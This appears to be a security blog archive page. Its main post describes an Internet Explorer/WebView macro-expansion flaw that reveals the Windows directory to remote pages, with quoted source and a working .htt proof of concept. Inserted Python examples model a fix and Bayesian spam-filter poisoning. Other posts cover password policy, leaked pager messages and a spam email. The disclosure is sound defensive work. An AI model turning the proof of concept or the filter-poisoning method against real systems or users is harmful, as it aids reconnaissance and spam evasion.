Well, we found a bug. I wouldn’t really call it a “Privilege Escalation”, but I guess you don’t have to be a hacker to bypass Windows security restrictions :)
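As an added example (not from the post), here is a small Python audit helper that reads and interprets the same Zone.Identifier stream, so an administrator can see which downloaded files carry the mark and which zone they came from. The sample stream and its URLs are constructed, and the stream read itself only works on NTFS under Windows.

```python
# Added example (not from the original post): parse the Zone.Identifier
# alternate data stream that Windows attaches to downloaded files, the
# same "ZoneId=3" value the post has its reader edit by hand.
from configparser import ConfigParser
from typing import Optional

# URL security zone numbers as they appear in the Zone.Identifier stream
ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}

def parse_zone_identifier(stream_text: str) -> dict:
    """Parse the INI-style [ZoneTransfer] section; return zone id, name and origin URLs."""
    cfg = ConfigParser(interpolation=None)
    cfg.read_string(stream_text)
    if not cfg.has_section("ZoneTransfer"):
        raise ValueError("no [ZoneTransfer] section in Zone.Identifier stream")
    section = cfg["ZoneTransfer"]
    zone_id = int(section["ZoneId"])          # KeyError if the mark is malformed
    return {
        "zone_id": zone_id,
        "zone": ZONE_NAMES.get(zone_id, "Unknown"),
        "referrer": section.get("ReferrerUrl"),
        "host": section.get("HostUrl"),
    }

def publisher_check_applies(zone_id: int) -> bool:
    """The 'unknown publisher' block only fires for files marked Internet or Restricted."""
    return zone_id in (3, 4)

def read_mark_of_the_web(path: str) -> Optional[dict]:
    """Read the ADS on NTFS (Windows only); None means no mark is present."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None

# Constructed sample of what the stream holds for a file saved from a browser
SAMPLE_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                 "ReferrerUrl=https://example.invalid/\r\n"
                 "HostUrl=https://example.invalid/setup.exe\r\n")

if __name__ == "__main__":
    info = parse_zone_identifier(SAMPLE_STREAM)
    print(info, publisher_check_applies(info["zone_id"]))
```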


Exploiting WebView through Internet Explorer to remotely discover the Windows directory

As with any large product, the Microsoft Windows operating system is built on the code of its previous versions. Some of this code goes back as far as Microsoft Windows 98.

In Windows 98 a new look called “WebView” was introduced: the way folders and the desktop are displayed is defined by HTML templates, which were also editable by the default administrative user. You can read more about it here: http://msdn.microsoft.com/en-s/library/bb776835(VS.85).aspx

Those HTML templates had the extension “htt”. In order for the folder templates to function properly and display the current folder, a few automatically expanded variables were added to the module that filters the “htt” files. These are:
%TEMPLATEDIR% (hardcoded)
%THISDIRPATH% (hardcoded)
%THISDIRNAME% (hardcoded)
%BACKGROUNDIMAGE% (registry)
%LOGOLINE% (registry)

This mechanism lives on today, deep inside Windows XP’s code, in two modules in the system32 folder:

    1) Webvw.dll
    2) Mshtml.dll

Webvw.dll is the module responsible for all WebView installation and normal activity, and mshtml.dll is the main module for HTML filtering and rendering used by Windows Explorer and Internet Explorer.

When Microsoft Windows is installed and webvw.dll is registered, it adds its CLSID and a few registry keys. The interesting ones are these:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\BACKGROUNDIMAGE
Default = “%SystemRoot%\Web\wvleft.bmp”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\LOGOLINE
Default = “%SystemRoot%\Web\wvline.gif”

Every time an htt file is rendered, those variables are replaced with the current system’s paths, without any local/remote or zone consideration.
This is the code inside mimeflt.cpp which contains the bug (lines 360 to 433):

#define REG_WEBVIEW_TEMPLATE_MACROS TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WebView\\TemplateMacros")

// Convert the raw macro name (ANSI or Unicode, depending on the document) to a TCHAR string.
void ConvertBytesToTChar(LPCBYTE pBuf, UINT nCharSize, LPTSTR psz, int cch) {

    if (SIZEOF(char) == nCharSize) {
        SHAnsiToTChar((LPCSTR)pBuf, psz, cch);
    } else {
        ASSERT(nCharSize == SIZEOF(WCHAR));
        SHUnicodeToTChar((LPCWSTR)pBuf, psz, cch);
    }
}

// Look up ...\WebView\TemplateMacros\<macro> in the registry and hand back its
// default value (a local path such as %SystemRoot%\Web\wvleft.bmp) as the expansion.
// Nothing here checks where the document being filtered came from.
void ExpandMacro(LPBYTE pszMacro, LPBYTE pszExpansion, int nBytes, UINT nCharSize) {

    TCHAR szExpansion[MAX_PATH];
    szExpansion[0] = TEXT('\0');
    TCHAR szTCharMacro[MAX_PATH];

    ConvertBytesToTChar(pszMacro, nCharSize, szTCharMacro, ARRAYSIZE(szTCharMacro));
    TCHAR szKey[MAX_PATH];
    lstrcpyn(szKey, REG_WEBVIEW_TEMPLATE_MACROS, ARRAYSIZE(szKey));
    StrCatBuff(szKey, TEXT("\\"), ARRAYSIZE(szKey));
    StrCatBuff(szKey, szTCharMacro, ARRAYSIZE(szKey));
    HKEY hkMacros;

    if (RegOpenKey(HKEY_CURRENT_USER, szKey, &hkMacros) == ERROR_SUCCESS && RegOpenKey(HKEY_LOCAL_MACHINE, szKey, &hkMacros) == ERROR_SUCCESS) {
        DWORD dwType;
        DWORD cbData = SIZEOF(szExpansion);
        SHQueryValueEx(hkMacros, NULL, NULL, &dwType, (LPBYTE)szExpansion, &cbData);
        RegCloseKey(hkMacros);
    }

    ConvertTCharToBytes(szExpansion, nCharSize, pszExpansion, nBytes);
}

// Called for every %NAME% token in the template: the three hard-coded macros are
// answered directly, anything else goes to the registry through ExpandMacro().
int CWebViewMimeFilter::_Expand(LPBYTE pszVar, LPBYTE * ppszExp) {
    if (!_StrCmp(pszVar, "TEMPLATEDIR", L"TEMPLATEDIR")) {
        if (!_szTemplateDirPath[0]) {
            GetMachineTemplateDir(_szTemplateDirPath, SIZEOF(_szTemplateDirPath), _nCharSize);
        }

        *ppszExp = _szTemplateDirPath;

    } else if (!_StrCmp(pszVar, "THISDIRPATH", L"THISDIRPATH")) {
        if (!_szThisDirPath[0]) {
            _QueryForDVCMDID(DVCMDID_GETTHISDIRPATH, _szThisDirPath, SIZEOF(_szThisDirPath));
        }
        *ppszExp = _szThisDirPath;

    } else if (!_StrCmp(pszVar, "THISDIRNAME", L"THISDIRNAME")) {
        if (!_szThisDirName[0]) {
            _QueryForDVCMDID(DVCMDID_GETTHISDIRNAME, _szThisDirName, SIZEOF(_szThisDirName));
        }
        *ppszExp = _szThisDirName;

    } else {
        // Registry-backed macros (BACKGROUNDIMAGE, LOGOLINE, ...) end up here.
        ExpandMacro(pszVar, _szExpansion, SIZEOF(_szExpansion), _nCharSize);
        *ppszExp = _szExpansion;
    }

    return _StrLen(*ppszExp);
}

In Windows XP the variables “%THISDIRPATH%” and “%THISDIRNAME%” were removed from the MIME filter, which means %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% are still translated into the current Windows directory.

The proof-of-concept code (remote WebView macro translation):
Save it on a remote host with an htt extension and replace “http:///filter_trap.htt

--------------------------- filter_trap.htt start ------------------
<div id="BACKGROUNDIMAGE">%BACKGROUNDIMAGE%</div>
<div id="LOGOLINE">%LOGOLINE%</div>
<div id="TEMPLATEDIR">%TEMPLATEDIR%</div>
<script>
alert(document.getElementById("BACKGROUNDIMAGE").innerHTML);
alert(document.getElementById("LOGOLINE").innerHTML);
alert(document.getElementById("TEMPLATEDIR").innerHTML);
</script>
--------------------------- filter_trap.htt end -------------------
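An added model (not Microsoft’s code) of the substitution described above, written in Python: the unchecked expansion beside a variant that honours the URL security zone, plus a check for leaked local paths in the rendered output. The registry values and the remote template below are constructed stand-ins for the ones the post quotes.

```python
# Added example (not Microsoft's code): a model of the mimeflt.cpp macro
# substitution described above, with the missing zone check added.
import re

# Constructed stand-in for the TemplateMacros registry values quoted above
TEMPLATE_MACROS = {
    "BACKGROUNDIMAGE": r"C:\WINDOWS\Web\wvleft.bmp",
    "LOGOLINE": r"C:\WINDOWS\Web\wvline.gif",
    "TEMPLATEDIR": r"C:\WINDOWS\Web",
}
URLZONE_LOCAL_MACHINE = 0   # urlmon zone 0: the only origin a folder template should have
MACRO_RE = re.compile(r"%([A-Z]+)%")

def expand_macros_unchecked(html: str, macros=TEMPLATE_MACROS) -> str:
    """Behaviour described in the post: expand for any document, whatever its origin."""
    return MACRO_RE.sub(lambda m: macros.get(m.group(1), m.group(0)), html)

def expand_macros_zone_aware(html: str, zone: int, macros=TEMPLATE_MACROS) -> str:
    """Hardened variant: expand only for Local Machine content, strip the tokens otherwise."""
    if zone == URLZONE_LOCAL_MACHINE:
        return expand_macros_unchecked(html, macros)
    return MACRO_RE.sub("", html)

def leaks_system_path(rendered: str) -> bool:
    """Detection helper: does the rendered output contain a local drive path?"""
    return re.search(r"[A-Za-z]:\\", rendered) is not None

# Constructed remote template, served from the Internet zone (3)
REMOTE_HTT = '<div id="BACKGROUNDIMAGE">%BACKGROUNDIMAGE%</div>'

if __name__ == "__main__":
    print(expand_macros_unchecked(REMOTE_HTT))        # leaks C:\WINDOWS\Web\wvleft.bmp
    print(expand_macros_zone_aware(REMOTE_HTT, 3))    # token stripped, nothing leaked
```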

Microsoft was notified a few months ago; the problem will be fixed.


Stop blaming us

Occasionally, I see articles like this.

Hackers don’t, as a rule, need to go to such lengths to crack passwords. That’s because most of us fail to follow good security habits. A recent article on PhysOrg cites a study that found people are the weak link in computer security.

This is silly. People don’t need to “follow good security habits” unless they have “security” somewhere in their title. Security is a means to an end, not the target. The target is to get the job done (or surf the web, or read your email).

Saying this is not just silly - it’s also dangerous. When experts say “people are the weakest link in computer security”, they remove all responsibility from the security industry to make security better, and easier, for users. Why work on preventing brute-force attacks on passwords? Instead let’s force our users to choose a 10 character password including at least 1 number and 1 letter of each case. Oh, and let’s prevent those walking security hazards from saving the password in the browser on their malware infested machines. Yeah, that’ll teach them. The article over at discovery.com suggests I use e$4WruX7 as a password - most helpful advice, if I ever saw any. Here’s a better suggestion for you Jonathan: have the system lock out for 24 hours after 3 failed tries. That will make guessing a simple 6 digit-only PIN take more than 450 years.

Enough with this. Users are not the weakest link any more than drivers are the weakest link in driving accidents. Sure, if we remove users (or drivers) from the equation, that solves all our problems. But since we can’t do that, let’s focus on making seat belts, and airbags, and warning systems. Or easier (not harder!) password systems, better protected servers and better user interfaces.


How to analyze timeline of 9/11 attacks - read pager traffic from N.Y. and Washington

Wikileaks has released hundreds of thousands of pager messages from 11th September, 2001.

Link: 911.wikileaks.org/

The listings say that the messages were sent over the networks of Arch Wireless, Metrocall, and SkyTel.


Heathrow calling

Here’s a weird spam I got last night:

Hello

The route taken through Customs is mainly determined by your point of departure and whether you are bringing into the country more duty payable goods than your free allowance. For those passengers who have flown in from outside the European Community (EC), their baggage will have a white tag and they must pass through either the Red or Green channel according to the amount of duty free goods they have. Those passengers arriving from countries within the EC should use the Blue channel, and their baggage will have green-edged tag.

As part of our routine check and based on the above, we have a consignment in your name; you are advised to come to the office address below

Customs office
Terminal 3
Heathrow Airport

You are required to come with the following:
1. Your ID
2. Diplomatic Tag either white or green-edge tag.
3. Non Inspection document

Your appointment time is 10am GMT, failure to comply; we will have over the matter to Metropolitan and the FBI. I am the officer in charge of your matter.

Thomas Smith
UK Customs
Heathrow Airport

It’s weird, because it contains no advertisement and no links. There’s nothing “encoded” in it - it seems to be an old version of this notice.

So why would a spammer waste valuable botnet cycles on sending me this email? The only explanation I could come up with is a “boy who cried wolf” attack. You send this email a few times, and the Bayesian filtering systems train themselves that this is a good email (i.e. “ham”). Most Bayesian spam filtering systems have a feedback mechanism where spam email is used to train the system further, and ham email is used to teach the system what “good” email is. If this email is seen a few times and considered ham, spam filters will accept something similar to it that contains a link. That link can be the spam or phishing attack.

Another guess is that it’s simply used to verify email addresses - you read that a scary Customs agent from Heathrow wants you in his office first thing tomorrow morning, and you quickly reply to ask what it’s about; the spammer (whose reply-to address is different from the “From”) gets a confirmation that your email address is valid, maybe with some more details like your phone number. This is a plausible explanation, but it seems like too much hard work just to get some valid email addresses.
Any other guesses?
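The feedback-loop effect described above, as an added example that is not part of the original post: a toy naive Bayes filter in Python, trained on a constructed corpus, that rejects the link-bearing follow-up until the harmless Heathrow-style message has been learned as ham a few times.

```python
# Added example (not from the original post): a tiny multinomial naive Bayes
# filter with the feedback loop the post describes, showing how a harmless
# "ham" message can teach the filter to accept a later lookalike with a link.
import math
from collections import Counter

class FeedbackBayesFilter:
    """Word-count naive Bayes with Laplace smoothing; train() is also the feedback loop."""
    def __init__(self):
        self.words = {"spam": Counter(), "ham": Counter()}
        self.docs = Counter()
        self.vocab = set()

    def train(self, label, text):
        tokens = text.lower().split()
        self.words[label].update(tokens)
        self.docs[label] += 1
        self.vocab.update(tokens)

    def log_odds_ham(self, text):
        """log P(ham|text) - log P(spam|text); positive means the filter calls it ham."""
        score = {}
        total_docs = sum(self.docs.values())
        for label in ("spam", "ham"):
            counts = self.words[label]
            denom = sum(counts.values()) + len(self.vocab)
            score[label] = math.log(self.docs[label] / total_docs)
            for tok in text.lower().split():
                score[label] += math.log((counts[tok] + 1) / denom)
        return score["ham"] - score["spam"]

    def classify(self, text):
        return "ham" if self.log_odds_ham(text) > 0 else "spam"

# Constructed corpus, kept tiny so the arithmetic can be checked by hand
SPAM = ["free prize click link", "click link win prize"]
HAM = ["meeting tomorrow office", "project office report"]
HEATHROW = "customs office heathrow appointment consignment"  # no link: looks like ham
FOLLOW_UP = "customs heathrow consignment click link"         # the later message with a link

def poisoning_demo():
    """Verdict on FOLLOW_UP before and after the feedback loop learns HEATHROW as ham."""
    f = FeedbackBayesFilter()
    for s in SPAM:
        f.train("spam", s)
    for h in HAM:
        f.train("ham", h)
    before = f.classify(FOLLOW_UP)
    for _ in range(3):              # the "cried wolf" mails, each accepted as ham
        f.train("ham", HEATHROW)
    after = f.classify(FOLLOW_UP)
    return before, after
```

The point for a filter operator is that unsolicited mail nobody replied to should not be promoted to ham merely because it was not flagged, since that is exactly the training signal this scenario exploits.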


Vulnerability Scanner